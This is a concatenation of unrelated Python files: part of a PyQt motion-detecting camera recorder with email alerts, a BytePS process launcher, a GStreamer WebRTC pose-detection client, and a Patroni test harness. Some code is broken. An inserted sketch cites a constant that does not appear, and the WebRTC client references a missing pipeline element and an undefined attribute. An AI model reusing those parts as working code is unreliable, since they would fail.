self.emailGroup.setEnabled(True) self.testemailButton.setEnabled(False) self.sendemailCheck.setEnabled(False) self.emailsetupButton.setText("Setup") def emailSendTracker(self, isDetected): currentDateTime = QtCore.QTime.currentTime().toString(QtCore.Qt.DefaultLocaleLongDate).split() currentDayLight = currentDateTime[1] currentTime = currentDateTime[0].split(':') currentTimeSeconds = int(currentTime[0])*3600 + int(currentTime[1])*60 + int(currentTime[2]) if isDetected: if self.sendoutStartTime == -1: # initialize # send out first email here print("Activity started: Send out first email") self.emailsender.send_emailalert(True,currentTimeSeconds,currentDayLight) self.sendoutStartTime = currentTimeSeconds else: # invoke timeout sequence (2 mins of inactivity, send out last email) if self.sendoutStartTime > -1: if currentTimeSeconds - self.sendoutStartTime > RECORD_INTERVAL: print("Activity ended: Send out last email") self.emailsender.send_emailalert(False,currentTimeSeconds,currentDayLight) self.sendoutStartTime = -1 def resizeEvent(self,event): # readjust ui according to window size # MainWindow.textEdit.setGeometry(QtCore.QRect(30, 80, 341, 441)) curr_mainframe_w = self.frameSize().width() curr_mainframe_h = self.frameSize().height() # Adjust tab widget size fixed_tab_x = self.tabWidget.geometry().x() fixed_tab_y = self.tabWidget.geometry().y() new_tab_w = curr_mainframe_w - 40 new_tab_h = curr_mainframe_h - 80 self.tabWidget.resize(new_tab_w,new_tab_h) # **** Set all elements relative to tabWidget_relativeSizeRatio **** # set triggerGroup Pos: new_trigger_x = fixed_tab_x + (new_tab_w - self.triggerGroupDim[0] - 40) new_trigger_y = fixed_tab_y self.triggerGroup.move(new_trigger_x,new_trigger_y) # set recordButton Pos: new_recordbtn_x = fixed_tab_x + (new_tab_w/2 - self.recordButtonDim[0]) new_recordbtn_y = fixed_tab_y + (new_tab_h - self.recordButtonDim[1] - 80) self.recordButton.move(new_recordbtn_x,new_recordbtn_y) # set filePath Pos: new_filepath_x = fixed_tab_x new_filepath_y = new_recordbtn_y - self.filepathTextDim[1] - 20 self.filepathText.move(new_filepath_x,new_filepath_y) # finally set the display size self.window_width = new_trigger_x - 40 self.window_height = new_filepath_y - 40 self.live_display.resize(self.window_width,self.window_height) 
def record_to(self): if self.record.getPreDefinedFilePath() == "undefined": # return filepath where video is saved dir_ = QtWidgets.QFileDialog.getExistingDirectory(None, 'Select a folder for record output:', '~/', QtWidgets.QFileDialog.ShowDirsOnly) if len(dir_) > 0: self.record.setPreDefinedFilePath(dir_) self.filepathText.setText('Saving video to: ' + dir_) else: self.record.setPreDefinedFilePath("undefined") else: if self.record.getRecordingStatus(): # stop recording self.record.turnOffRecording() self.recordButton.setText('Record') else: self.record.invokeRecording() if self.record.getRecordingStatus(): self.recordButton.setText('Stop') def record_on_detection(self): if self.subjectCheck.isChecked(): self.recordOnPresence = True else: self.recordOnPresence = False def record_on_motion(self): if self.motionCheck.isChecked(): self.recordOnMotion = True else: self.recordOnMotion = False def recordTriggerFunc(self, frame): # record on presence only if self.recordOnPresence and not self.recordOnMotion: if self.isDetected: if self.inactiveCount >= RECORD_INTERVAL: # estimate 2 sec of detect nothing self.record.invokeRecording() #reinitalize self.record.vidWriter.write(frame) self.inactiveCount = 0 else: if self.inactiveCount < RECORD_INTERVAL: self.inactiveCount += 1 else: self.record.killRecorder() elif self.recordOnMotion and not self.recordOnPresence: if self.isMoving: if self.noMotionCount >= RECORD_INTERVAL: self.record.invokeRecording() self.record.vidWriter.write(frame) self.noMotionCount = 0 else: if self.noMotionCount < RECORD_INTERVAL: self.noMotionCount += 1 else: self.record.killRecorder() elif self.recordOnMotion and self.recordOnPresence: if self.isDetected or self.isMoving: if self.inactiveCount >= RECORD_INTERVAL and self.noMotionCount >= RECORD_INTERVAL: self.record.invokeRecording() self.record.vidWriter.write(frame) self.inactiveCount = 0 self.noMotionCount = 0 else: assessOne = False assessTwo = False if self.noMotionCount < RECORD_INTERVAL: self.noMotionCount += 1 else: assessOne = True if self.inactiveCount < RECORD_INTERVAL: self.inactiveCount += 1 else: assessTwo = True if assessOne and assessTwo: self.record.killRecorder() else: # Record everything in interval of 2 minutes if self.timetracker == -1: self.timetracker = self.record.getCurrentTime() else: ref_hr, ref_min, ref_sec, _ = self.timetracker.split('_') refTimeInSeconds = int(ref_min)*60 + int(ref_sec) cur_hr, cur_min, cur_sec, _ = self.record.getCurrentTime().split('_') curTimeInSeconds = int(cur_min)*60 + int(cur_sec) if curTimeInSeconds - refTimeInSeconds >= RECORD_INTERVAL: self.record.invokeRecording() self.timetracker = self.record.getCurrentTime() self.record.vidWriter.write(frame) def drawOnFrame(self, inputImg, isMotion): # Tag date cv2.putText(inputImg,self.record.getDisplayLabel(), self.datetimeTagLocation, cv2.FONT_HERSHEY_SIMPLEX, 1, self.datetimeTagColour, 2, cv2.LINE_AA) # Tag motion indicator if isMotion: cv2.putText(inputImg,"Motion Detected!", self.motionTagLocation, cv2.FONT_HERSHEY_SIMPLEX, 1, self.motionTagColour, 2, cv2.LINE_AA) def displayFrame(self, img): img_height, img_width, img_colors = img.shape scale_w = float(self.window_width) / float(img_width) scale_h = float(self.window_height) / float(img_height) scale = min([scale_w, scale_h]) if scale == 0: scale = 1 img = cv2.resize(img, None, fx=scale, fy=scale, interpolation = cv2.INTER_CUBIC) img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB) height, width, bpc = img.shape bpl = bpc * width image = QtGui.QImage(img.data, width, height, bpl, 
QtGui.QImage.Format_RGB888) pix = QtGui.QPixmap(image) self.live_display.setPixmap(pix) # Live Mode def update_frame(self): if not q.empty(): # UI thingy self.recordButton.setEnabled(True) # grab frame from video thread try: frame = q.get() img = frame["img"] except: print("error obtaining images") else: # detect motion if self.recordOnMotion: # detect motion motionImg = img.copy() self.isMoving = self.motiondetect.detectmotion(motionImg) else: self.isMoving = False # detect presence if self.recordOnPresence: # detect objects and indicate on display img, self.isDetected = self.detector.process_image(img) else: self.isDetected = False if self.sendOnActivity: if self.isMoving or self.isDetected: self.emailSendTracker(True) else: self.emailSendTracker(False) # Tag the frame with indications self.drawOnFrame(img,self.isMoving) if self.record.getRecordingStatus(): self.recordTriggerFunc(img) # show frame with annotation self.displayFrame(img) def closeEvent(self, event): global cam_running cam_running = False self.record.killRecorder() def main(): capture_thread = threading.Thread(target=grab, args = (CAM_INDEX, q, CAM_WIDTH, CAM_HEIGHT, CAM_FPS)) capture_thread.start() app = QtWidgets.QApplication(sys.argv) w = MyWindowClass(None) w.setWindowTitle(WINDOW_TITLE) w.show() app.exec_() main()
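# ---------------------------------------------------------------------------
# Illustrative sketch, not part of the application: the activity-gated
# recording idea behind recordTriggerFunc() reduced to a standalone helper.
# Frames keep being written while activity is detected and for a grace period
# of `grace_frames` frames afterwards (cf. RECORD_EXTENSION above). The helper
# name and the mutable `state` dict are hypothetical.
# ---------------------------------------------------------------------------
def example_gated_write(writer, frame, active, state, grace_frames=RECORD_EXTENSION):
    if active:
        state['idle_frames'] = 0
    else:
        state['idle_frames'] = state.get('idle_frames', 0) + 1
    if state['idle_frames'] <= grace_frames:
        writer.write(frame)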
launch.py
#!/usr/bin/python from __future__ import print_function import os import subprocess import threading import sys import time def worker(local_rank, local_size, command): my_env = os.environ.copy() my_env["BYTEPS_LOCAL_RANK"] = str(local_rank) my_env["BYTEPS_LOCAL_SIZE"] = str(local_size) if os.getenv("BYTEPS_ENABLE_GDB", 0): if command.find("python") != 0: command = "python " + command command = "gdb -ex 'run' -ex 'bt' -batch --args " + command subprocess.check_call(command, env=my_env, stdout=sys.stdout, stderr=sys.stderr, shell=True) if __name__ == "__main__": print("BytePS launching " + os.environ["DMLC_ROLE"]) sys.stdout.flush() if os.environ["DMLC_ROLE"] == "worker": if "NVIDIA_VISIBLE_DEVICES" in os.environ: local_size = len(os.environ["NVIDIA_VISIBLE_DEVICES"].split(",")) else: local_size = 1 t = [None] * local_size for i in range(local_size): command = ' '.join(sys.argv[1:]) t[i] = threading.Thread(target=worker, args=[i, local_size, command]) t[i].daemon = True t[i].start() for i in range(local_size): t[i].join() else: if "BYTEPS_SERVER_MXNET_PATH" not in os.environ: print("BYTEPS_SERVER_MXNET_PATH env not set") os._exit(0) sys.path.insert(0, os.getenv("BYTEPS_SERVER_MXNET_PATH")+"/python") import mxnet
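# ---------------------------------------------------------------------------
# Illustrative sketch, not part of this launcher: a command started by the
# worker() function above can recover its per-process placement from the
# environment variables the launcher sets before spawning it.
# ---------------------------------------------------------------------------
# # inside the launched training script
# local_rank = int(os.environ.get("BYTEPS_LOCAL_RANK", "0"))
# local_size = int(os.environ.get("BYTEPS_LOCAL_SIZE", "1"))
# print("I am local worker %d of %d" % (local_rank, local_size))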
appsrc-py-appsink3.py
import random import ssl import websockets import asyncio import threading import os import sys import json import argparse import time from io import BytesIO import cv2 import numpy import sys import mp as pn detector = pn.Model() import gi gi.require_version('Gst', '1.0') from gi.repository import Gst, GObject, GLib gi.require_version('GstWebRTC', '1.0') from gi.repository import GstWebRTC gi.require_version('GstSdp', '1.0') from gi.repository import GstSdp gi.require_version('GstApp', '1.0') from websockets.version import version as wsv #GObject.threads_init() # Main pipeline here: PIPELINE_DESC2 = ''' webrtcbin name=sendrecv bundle-policy=max-bundle stun-server=stun://stun.l.google.com:19302 videotestsrc is-live=true pattern=ball ! videoconvert ! queue ! vp8enc deadline=1 ! rtpvp8pay ! queue ! application/x-rtp,media=video,encoding-name=VP8,payload=97 ! sendrecv. ''' image_arr = None sender = None pipetmp = None caps_global = None class WebRTCClient: def __init__(self, id_, peer_id, server): self.id_ = id_ self.conn = None # self.conn_meta = None self.pipe = None self.pipe2 = None self.webrtc = None self.peer_id = peer_id self.stun_server = "stun://stun.l.google.com:19302" self.server = server or 'wss://dxmpp.online:8443' # self.server_meta = 'wss://dxmpp.online:8000' self.is_push_buffer_allowed = False self._mainloop = GLib.MainLoop() self._src = None self.image_arr = numpy.zeros((480,640,3), numpy.uint8) # Framerate control attributes: self.done_processing = True self.interval_ms = 33 self.frame_stamp = 0 self.thread_1 = None self.arr = None def gst_to_opencv(self, sample): buf = sample.get_buffer() buff=buf.extract_dup(0, buf.get_size()) global caps_global caps = sample.get_caps() caps_global = caps #print(caps.get_structure(0).get_value('format')) #print(caps.get_structure(0).get_value('height')) #print(caps.get_structure(0).get_value('width')) # print(buf.get_size()) arr = numpy.ndarray((caps.get_structure(0).get_value('height'), caps.get_structure(0).get_value('width'), 3), buffer=buff, dtype=numpy.uint8) return arr def process_buffer(self): self.done_processing = False metadata, self.image_arr = detector.posenet_detect(self.arr) # Send metadata via Websocket connection msg = json.dumps({"keypoints": metadata}) #msg = '{' + "'keypoints': " + f"{metadata}" + '}' # Produce to Kafka topic #producer.send('pose_meta', key=b'keypoints', value=msg.encode('utf-8')) try: loop = asyncio.new_event_loop() loop.run_until_complete(self.conn.send(msg)) loop.close() except: print('Meta transmission error') self.done_processing = True def new_buffer(self, sink, data): time_now = 1000 * time.time() real_frame_interval = time_now - self.frame_stamp self.frame_stamp = time_now print("-----------------> Frametime: ", real_frame_interval) sample = sink.emit("pull-sample") if (self.done_processing is True): # and (real_frame_interval >= self.interval_ms)): self.arr = self.gst_to_opencv(sample) a = 1000 * time.time() self.arr = cv2.resize(self.arr, (640, 480), interpolation = cv2.INTER_NEAREST) self.arr = cv2.flip(self.arr, 1) threading.Thread(target=self.process_buffer).start() #self.image_arr = self.arr print("====> Time to process a frame: ", ((1000 * time.time()) - a)) return Gst.FlowReturn.OK def start_feed(self, src, length): #print('======================> need data length: %s' % length) self.is_push_buffer_allowed = True #ret,thresh1 = cv2.threshold(image_arr,127,255,cv2.THRESH_BINARY) #metadata, self.image_arr = detector.posenet_detect(self.image_arr) self.push(self.image_arr) def 
stop_feed(self, src): #print('======================> enough_data') self.is_push_buffer_allowed = False def run(self): """ Run - blocking. """ self._mainloop.run() def push(self, data): #print('Push a buffer into the source') if self.is_push_buffer_allowed: # print('Push allowed') data1 = data.tobytes() buf = Gst.Buffer.new_allocate(None, len(data1), None) buf.fill(0, data1) # Create GstSample sample = Gst.Sample.new(buf, Gst.caps_from_string("video/x-raw,format=BGR,width=640,height=480,framerate=(fraction)30/1"), None, None) # Push Sample on appsrc gst_flow_return = self._src.emit('push-sample', sample) if gst_flow_return != Gst.FlowReturn.OK: print('We got some error, stop sending data') else: pass #print('It is enough data for buffer....') async def connect(self): print('Connect stage!') sslctx = ssl.create_default_context(purpose=ssl.Purpose.CLIENT_AUTH) self.conn = await websockets.connect(self.server, ssl=sslctx) self.conn_meta = await websockets.connect(self.server_meta, ssl=sslctx) await self.conn.send('HELLO %d' % self.id_) await self.conn_meta.send('HELLO %d' % self.id_) async def setup_call(self): print('Setup call stage!') await self.conn.send('SESSION {}'.format(self.peer_id)) def send_sdp_offer(self, offer): print('Send SDP offer stage!') text = offer.sdp.as_text() print ('Sending offer:\n%s' % text) msg = json.dumps({'sdp': {'type': 'offer', 'sdp': text}}) loop = asyncio.new_event_loop() loop.run_until_complete(self.conn.send(msg)) loop.close() def on_offer_created(self, promise, _, __): print('on_offer_created stage!') promise.wait() reply = promise.get_reply() offer = reply.get_value('offer') promise = Gst.Promise.new() self.webrtc.emit('set-local-description', offer, promise) promise.interrupt() self.send_sdp_offer(offer) def on_negotiation_needed(self, element): print('on_negotiation_needed stage!') promise = Gst.Promise.new_with_change_func(self.on_offer_created, element, None) element.emit('create-offer', None, promise) def send_ice_candidate_message(self, _, mlineindex, candidate): print('Send ice candidate stage!') icemsg = json.dumps({'ice': {'candidate': candidate, 'sdpMLineIndex': mlineindex}}) loop = asyncio.new_event_loop() loop.run_until_complete(self.conn.send(icemsg)) loop.close() def on_incoming_decodebin_stream(self, _, pad): print('On incoming decodebin stream stage!') if not pad.has_current_caps(): print (pad, 'has no caps, ignoring') return # caps = pad.get_current_caps() caps = Gst.caps_from_string("video/x-raw, format=(string){BGR, GRAY8}; video/x-bayer,format=(string){rggb,bggr,grbg,gbrg},framerate=30/1") # print(caps.get_structure(0).get_value('format')) # print(caps.get_structure(0).get_value('height')) # print(caps.get_structure(0).get_value('width')) name = caps.to_string() if name.startswith('video'): q = Gst.ElementFactory.make('queue2') #capsfilter = Gst.ElementFactory.make('capsfilter') #capsfilter.set_property("caps", Gst.caps_from_string("video/x-raw,framerate=(fraction)30/1")) conv = Gst.ElementFactory.make('videoconvert') r = Gst.ElementFactory.make('videorate') #r.set_property("max-rate", 30) # sink = Gst.ElementFactory.make('autovideosink') sink = Gst.ElementFactory.make('appsink', 'sink') #q.set_property("max-size-bytes", 65586) sink.set_property("emit-signals", True) sink.set_property("enable-last-sample", False) sink.set_property("sync", False) sink.set_property("drop", True) sink.set_property("async", True) sink.set_property("max-buffers", 2) #sink.set_property("max-lateness", 66000000) sink.set_property("caps", caps) 
self.pipe.add(q) self.pipe.add(conv) #self.pipe.add(r) self.pipe.add(sink) self.pipe.sync_children_states() pad.link(q.get_static_pad('sink')) q.link(conv) #capsfilter.link(conv) #pad.link(r.get_static_pad('sink')) #r.link(conv) conv.link(sink) #r.link(sink) sink.connect("new-sample", self.new_buffer, sink) elif name.startswith('audio'): pass def on_incoming_stream(self, _, pad): print('On incoming stream stage!') if pad.direction != Gst.PadDirection.SRC: print('Pad Direction not source!') return decodebin = Gst.ElementFactory.make('decodebin') decodebin.connect('pad-added', self.on_incoming_decodebin_stream) #decodebin.set_property('use-buffering', False) #decodebin.set_property('max-size-buffers', 1) print('Called on incoming decodebin stream!') self.pipe.add(decodebin) decodebin.sync_state_with_parent() self.webrtc.link(decodebin) def start_pipeline(self): print('Starting pipeline!') #caps_src = Gst.caps_from_string("video/x-raw,format=BGR,width=640,height=480,framerate=(fraction)30/1") self.pipe = Gst.parse_launch(PIPELINE_DESC2) self.webrtc = self.pipe.get_by_name('sendrecv') self.webrtc.connect('on-negotiation-needed', self.on_negotiation_needed) self.webrtc.connect('on-ice-candidate', self.send_ice_candidate_message) self.webrtc.connect('pad-added', self.on_incoming_stream) self._src = self.pipe.get_by_name('source1') self._src.set_property('emit-signals', True) #self._src.set_property('leaky-type', 2) #self._src.set_property('max-bytes', 1000) self._src.set_property('max-bytes', 1000000) #self._src.set_property('caps', caps_src) self._src.set_property('format', 'time') self._src.set_property('do-timestamp', True) self._src.connect('need-data', self.start_feed) self._src.connect('enough-data', self.stop_feed) self.pipe.set_state(Gst.State.PLAYING) def handle_sdp(self, message): print('Handle sdp message stage!') #assert (self.webrtc) msg = json.loads(message) if 'sdp' in msg: sdp = msg['sdp'] print(sdp['type'], sdp['sdp']) #assert(sdp['type'] == 'answer') sdp = sdp['sdp'] print ('Received answer:\n%s' % sdp) res, sdpmsg = GstSdp.SDPMessage.new() GstSdp.sdp_message_parse_buffer(bytes(sdp.encode()), sdpmsg) answer = GstWebRTC.WebRTCSessionDescription.new(GstWebRTC.WebRTCSDPType.ANSWER, sdpmsg) promise = Gst.Promise.new() self.webrtc.emit('set-remote-description', answer, promise) promise.interrupt() elif 'ice' in msg: ice = msg['ice'] candidate = ice['candidate'] sdpmlineindex = ice['sdpMLineIndex'] self.webrtc.emit('add-ice-candidate', sdpmlineindex, candidate) def close_pipeline(self): try: self.pipe.set_state(Gst.State.NULL) except: pass self.pipe = None self.webrtc = None async def loop(self): assert self.conn async for message in self.conn: print(message) sdpoffer = "offer" if message == 'HELLO': pass #await self.setup_call() elif message == 'SESSION_OK': print('SESSION OK!!!') #self.start_pipeline() elif message.startswith('ERROR'): print (message) self.close_pipeline() return 1 elif sdpoffer in message: print('SDP OFFER IN MESSAGE') self.start_pipeline() else: self.handle_sdp(message) self.close_pipeline() return 0 async def stop(self): if self.conn: await self.conn.close() await self.conn_meta.close() self.conn = None def check_plugins(): needed = ["opus", "vpx", "nice", "webrtc", "dtls", "srtp", "rtp", "rtpmanager", "videotestsrc", "audiotestsrc"] missing = list(filter(lambda p: Gst.Registry.get().find_plugin(p) is None, needed)) if len(missing): print('Missing gstreamer plugins:', missing) return False return True if __name__=='__main__': while True: Gst.init(None) if not 
check_plugins(): sys.exit(1) parser = argparse.ArgumentParser() parser.add_argument('peerid', help='String ID of the peer to connect to') parser.add_argument('--server', help='Signalling server to connect to, eg "wss://127.0.0.1:8443"') args = parser.parse_args() our_id = 7331 c = WebRTCClient(our_id, args.peerid, args.server) loop = asyncio.get_event_loop() loop.run_until_complete(c.connect()) res = loop.run_until_complete(c.loop()) #sys.exit(res)
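# ---------------------------------------------------------------------------
# Illustrative sketch, not part of this client: the appsink-to-numpy
# conversion used in gst_to_opencv() shown in a minimal standalone pipeline.
# Assumes Gst.init(None) has already been called and that a videotestsrc is an
# acceptable stand-in source; left commented out because it needs a GStreamer
# runtime.
# ---------------------------------------------------------------------------
# pipe = Gst.parse_launch(
#     'videotestsrc num-buffers=1 ! videoconvert ! '
#     'video/x-raw,format=BGR,width=320,height=240 ! appsink name=snap')
# sink = pipe.get_by_name('snap')
# pipe.set_state(Gst.State.PLAYING)
# sample = sink.emit('pull-sample')  # action signal; blocks until a frame arrives
# caps = sample.get_caps().get_structure(0)
# buf = sample.get_buffer()
# data = buf.extract_dup(0, buf.get_size())
# frame = numpy.ndarray((caps.get_value('height'), caps.get_value('width'), 3),
#                       buffer=data, dtype=numpy.uint8)
# pipe.set_state(Gst.State.NULL)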
environment.py
import abc import consul import datetime import etcd import kazoo.client import kazoo.exceptions import os import psutil import psycopg2 import json import shutil import signal import six import subprocess import tempfile import threading import time import yaml @six.add_metaclass(abc.ABCMeta) class AbstractController(object): def __init__(self, context, name, work_directory, output_dir): self._context = context self._name = name self._work_directory = work_directory self._output_dir = output_dir self._handle = None self._log = None def _has_started(self): return self._handle and self._handle.pid and self._handle.poll() is None def _is_running(self): return self._has_started() @abc.abstractmethod def _is_accessible(self): """process is accessible for queries""" @abc.abstractmethod def _start(self): """start process""" def start(self, max_wait_limit=5): if self._is_running(): return True self._log = open(os.path.join(self._output_dir, self._name + '.log'), 'a') self._handle = self._start() assert self._has_started(), "Process {0} is not running after being started".format(self._name) max_wait_limit *= self._context.timeout_multiplier for _ in range(max_wait_limit): if self._is_accessible(): break time.sleep(1) else: assert False,\ "{0} instance is not available for queries after {1} seconds".format(self._name, max_wait_limit) def stop(self, kill=False, timeout=15, _=False): term = False start_time = time.time() timeout *= self._context.timeout_multiplier while self._handle and self._is_running(): if kill: self._handle.kill() elif not term: self._handle.terminate() term = True time.sleep(1) if not kill and time.time() - start_time > timeout: kill = True if self._log: self._log.close() def cancel_background(self): pass class PatroniController(AbstractController): __PORT = 5440 PATRONI_CONFIG = '{}.yml' """ starts and stops individual patronis""" def __init__(self, context, name, work_directory, output_dir, custom_config=None): super(PatroniController, self).__init__(context, 'patroni_' + name, work_directory, output_dir) PatroniController.__PORT += 1 self._data_dir = os.path.join(work_directory, 'data', name) self._connstring = None if custom_config and 'watchdog' in custom_config: self.watchdog = WatchdogMonitor(name, work_directory, output_dir) custom_config['watchdog'] = {'driver': 'testing', 'device': self.watchdog.fifo_path, 'mode': 'required'} else: self.watchdog = None self._scope = (custom_config or {}).get('scope', 'batman') self._config = self._make_patroni_test_config(name, custom_config) self._closables = [] self._conn = None self._curs = None def write_label(self, content): with open(os.path.join(self._data_dir, 'label'), 'w') as f: f.write(content) def read_label(self): try: with open(os.path.join(self._data_dir, 'label'), 'r') as f: return f.read().strip() except IOError: return None @staticmethod def recursive_update(dst, src): for k, v in src.items(): if k in dst and isinstance(dst[k], dict): PatroniController.recursive_update(dst[k], v) else: dst[k] = v def update_config(self, custom_config): with open(self._config) as r: config = yaml.safe_load(r) self.recursive_update(config, custom_config) with open(self._config, 'w') as w: yaml.safe_dump(config, w, default_flow_style=False) self._scope = config.get('scope', 'batman') def add_tag_to_config(self, tag, value): self.update_config({'tags': {tag: value}}) def _start(self): if self.watchdog: self.watchdog.start() if isinstance(self._context.dcs_ctl, KubernetesController): self._context.dcs_ctl.create_pod(self._name[8:], 
self._scope) os.environ['PATRONI_KUBERNETES_POD_IP'] = '10.0.0.' + self._name[-1] return subprocess.Popen(['coverage', 'run', '--source=patroni', '-p', 'patroni.py', self._config], stdout=self._log, stderr=subprocess.STDOUT, cwd=self._work_directory) def stop(self, kill=False, timeout=15, postgres=False): if postgres: return subprocess.call(['pg_ctl', '-D', self._data_dir, 'stop', '-mi', '-w']) super(PatroniController, self).stop(kill, timeout) if isinstance(self._context.dcs_ctl, KubernetesController): self._context.dcs_ctl.delete_pod(self._name[8:]) if self.watchdog: self.watchdog.stop() def _is_accessible(self): cursor = self.query("SELECT 1", fail_ok=True) if cursor is not None: cursor.execute("SET synchronous_commit TO 'local'") return True def _make_patroni_test_config(self, name, custom_config): patroni_config_name = self.PATRONI_CONFIG.format(name) patroni_config_path = os.path.join(self._output_dir, patroni_config_name) with open(patroni_config_name) as f: config = yaml.safe_load(f) config.pop('etcd', None) host = config['postgresql']['listen'].split(':')[0] config['postgresql']['listen'] = config['postgresql']['connect_address'] = '{0}:{1}'.format(host, self.__PORT) config['name'] = name config['postgresql']['data_dir'] = self._data_dir config['postgresql']['use_unix_socket'] = True config['postgresql']['parameters'].update({ 'logging_collector': 'on', 'log_destination': 'csvlog', 'log_directory': self._output_dir, 'log_filename': name + '.log', 'log_statement': 'all', 'log_min_messages': 'debug1', 'unix_socket_directories': self._data_dir}) if 'bootstrap' in config: config['bootstrap']['post_bootstrap'] = 'psql -w -c "SELECT 1"' if 'initdb' in config['bootstrap']: config['bootstrap']['initdb'].extend([{'auth': 'md5'}, {'auth-host': 'md5'}]) if custom_config is not None: self.recursive_update(config, custom_config) if config['postgresql'].get('callbacks', {}).get('on_role_change'): config['postgresql']['callbacks']['on_role_change'] += ' ' + str(self.__PORT) with open(patroni_config_path, 'w') as f: yaml.safe_dump(config, f, default_flow_style=False) user = config['postgresql'].get('authentication', config['postgresql']).get('superuser', {}) self._connkwargs = {k: user[n] for n, k in [('username', 'user'), ('password', 'password')] if n in user} self._connkwargs.update({'host': host, 'port': self.__PORT, 'database': 'postgres'}) self._replication = config['postgresql'].get('authentication', config['postgresql']).get('replication', {}) self._replication.update({'host': host, 'port': self.__PORT, 'database': 'postgres'}) return patroni_config_path def _connection(self): if not self._conn or self._conn.closed != 0: self._conn = psycopg2.connect(**self._connkwargs) self._conn.autocommit = True return self._conn def _cursor(self): if not self._curs or self._curs.closed or self._curs.connection.closed != 0: self._curs = self._connection().cursor() return self._curs def query(self, query, fail_ok=False): try: cursor = self._cursor() cursor.execute(query) return cursor except psycopg2.Error: if not fail_ok: raise def check_role_has_changed_to(self, new_role, timeout=10): bound_time = time.time() + timeout recovery_status = new_role != 'primary' while time.time() < bound_time: cur = self.query("SELECT pg_is_in_recovery()", fail_ok=True) if cur: row = cur.fetchone() if row and row[0] == recovery_status: return True time.sleep(1) return False def get_watchdog(self): return self.watchdog def _get_pid(self): try: pidfile = os.path.join(self._data_dir, 'postmaster.pid') if not 
os.path.exists(pidfile):
                return None
            return int(open(pidfile).readline().strip())
        except Exception:
            return None

    def database_is_running(self):
        pid = self._get_pid()
        if not pid:
            return False
        try:
            os.kill(pid, 0)
        except OSError:
            return False
        return True

    def patroni_hang(self, timeout):
        hang = ProcessHang(self._handle.pid, timeout)
        self._closables.append(hang)
        hang.start()

    def checkpoint_hang(self, timeout):
        pid = self._get_pid()
        if not pid:
            return False
        proc = psutil.Process(pid)
        for child in proc.children():
            if 'checkpoint' in child.cmdline()[0]:
                checkpointer = child
                break
        else:
            return False
        hang = ProcessHang(checkpointer.pid, timeout)
        self._closables.append(hang)
        hang.start()
        return True

    def cancel_background(self):
        for obj in self._closables:
            obj.close()
        self._closables = []

    def terminate_backends(self):
        pid = self._get_pid()
        if not pid:
            return False
        proc = psutil.Process(pid)
        for p in proc.children():
            if 'process' not in p.cmdline()[0]:
                p.terminate()

    @property
    def backup_source(self):
        return 'postgres://{username}:{password}@{host}:{port}/{database}'.format(**self._replication)

    def backup(self, dest='basebackup'):
        subprocess.call([PatroniPoolController.BACKUP_SCRIPT, '--walmethod=none',
                         '--datadir=' + os.path.join(self._output_dir, dest),
                         '--dbname=' + self.backup_source])


class ProcessHang(object):

    """A background thread implementing a cancelable process hang via SIGSTOP."""

    def __init__(self, pid, timeout):
        self._cancelled = threading.Event()
        self._thread = threading.Thread(target=self.run)
        self.pid = pid
        self.timeout = timeout

    def start(self):
        self._thread.start()

    def run(self):
        os.kill(self.pid, signal.SIGSTOP)
        try:
            self._cancelled.wait(self.timeout)
        finally:
            os.kill(self.pid, signal.SIGCONT)

    def close(self):
        self._cancelled.set()
        self._thread.join()


class AbstractDcsController(AbstractController):

    _CLUSTER_NODE = '/service/{0}'

    def __init__(self, context, mktemp=True):
        work_directory = mktemp and tempfile.mkdtemp() or None
        super(AbstractDcsController, self).__init__(context, self.name(), work_directory, context.pctl.output_dir)

    def _is_accessible(self):
        return self._is_running()

    def stop(self, kill=False, timeout=15):
        """ terminate process and wipe out the temp work directory, but only if we actually started it """
        super(AbstractDcsController, self).stop(kill=kill, timeout=timeout)
        if self._work_directory:
            shutil.rmtree(self._work_directory)

    def path(self, key=None, scope='batman'):
        return self._CLUSTER_NODE.format(scope) + (key and '/' + key or '')

    @abc.abstractmethod
    def query(self, key, scope='batman'):
        """ query for a value of a given key """

    @abc.abstractmethod
    def cleanup_service_tree(self):
        """ clean all contents stored in the tree used for the tests """

    @classmethod
    def get_subclasses(cls):
        for subclass in cls.__subclasses__():
            for subsubclass in subclass.get_subclasses():
                yield subsubclass
            yield subclass

    @classmethod
    def name(cls):
        return cls.__name__[:-10].lower()


class ConsulController(AbstractDcsController):

    def __init__(self, context):
        super(ConsulController, self).__init__(context)
        os.environ['PATRONI_CONSUL_HOST'] = 'localhost:8500'
        os.environ['PATRONI_CONSUL_REGISTER_SERVICE'] = 'on'
        self._client = consul.Consul()
        self._config_file = None

    def _start(self):
        self._config_file = self._work_directory + '.json'
        with open(self._config_file, 'wb') as f:
            f.write(b'{"session_ttl_min":"5s","server":true,"bootstrap":true,"advertise_addr":"127.0.0.1"}')
        return subprocess.Popen(['consul', 'agent', '-config-file', self._config_file,
                                 '-data-dir', self._work_directory],
                                stdout=self._log, stderr=subprocess.STDOUT)

    def stop(self, kill=False, timeout=15):
        super(ConsulController, self).stop(kill=kill, timeout=timeout)
        if self._config_file:
            os.unlink(self._config_file)

    def _is_running(self):
        try:
            return bool(self._client.status.leader())
        except Exception:
            return False

    def path(self, key=None, scope='batman'):
        return super(ConsulController, self).path(key, scope)[1:]

    def query(self, key, scope='batman'):
        _, value = self._client.kv.get(self.path(key, scope))
        return value and value['Value'].decode('utf-8')

    def cleanup_service_tree(self):
        self._client.kv.delete(self.path(scope=''), recurse=True)

    def start(self, max_wait_limit=15):
        super(ConsulController, self).start(max_wait_limit)


class EtcdController(AbstractDcsController):

    """ handles all etcd related tasks, used for the tests setup and cleanup """

    def __init__(self, context):
        super(EtcdController, self).__init__(context)
        os.environ['PATRONI_ETCD_HOST'] = 'localhost:2379'
        self._client = etcd.Client(port=2379)

    def _start(self):
        return subprocess.Popen(["etcd", "--debug", "--data-dir", self._work_directory],
                                stdout=self._log, stderr=subprocess.STDOUT)

    def query(self, key, scope='batman'):
        try:
            return self._client.get(self.path(key, scope)).value
        except etcd.EtcdKeyNotFound:
            return None

    def cleanup_service_tree(self):
        try:
            self._client.delete(self.path(scope=''), recursive=True)
        except (etcd.EtcdKeyNotFound, etcd.EtcdConnectionFailed):
            return
        except Exception as e:
            assert False, "exception when cleaning up etcd contents: {0}".format(e)

    def _is_running(self):
        # etcd may be running even if we didn't start it ourselves
        try:
            return bool(self._client.machines)
        except Exception:
            return False


class KubernetesController(AbstractDcsController):

    def __init__(self, context):
        super(KubernetesController, self).__init__(context)
        self._namespace = 'default'
        self._labels = {"application": "patroni"}
        self._label_selector = ','.join('{0}={1}'.format(k, v) for k, v in self._labels.items())
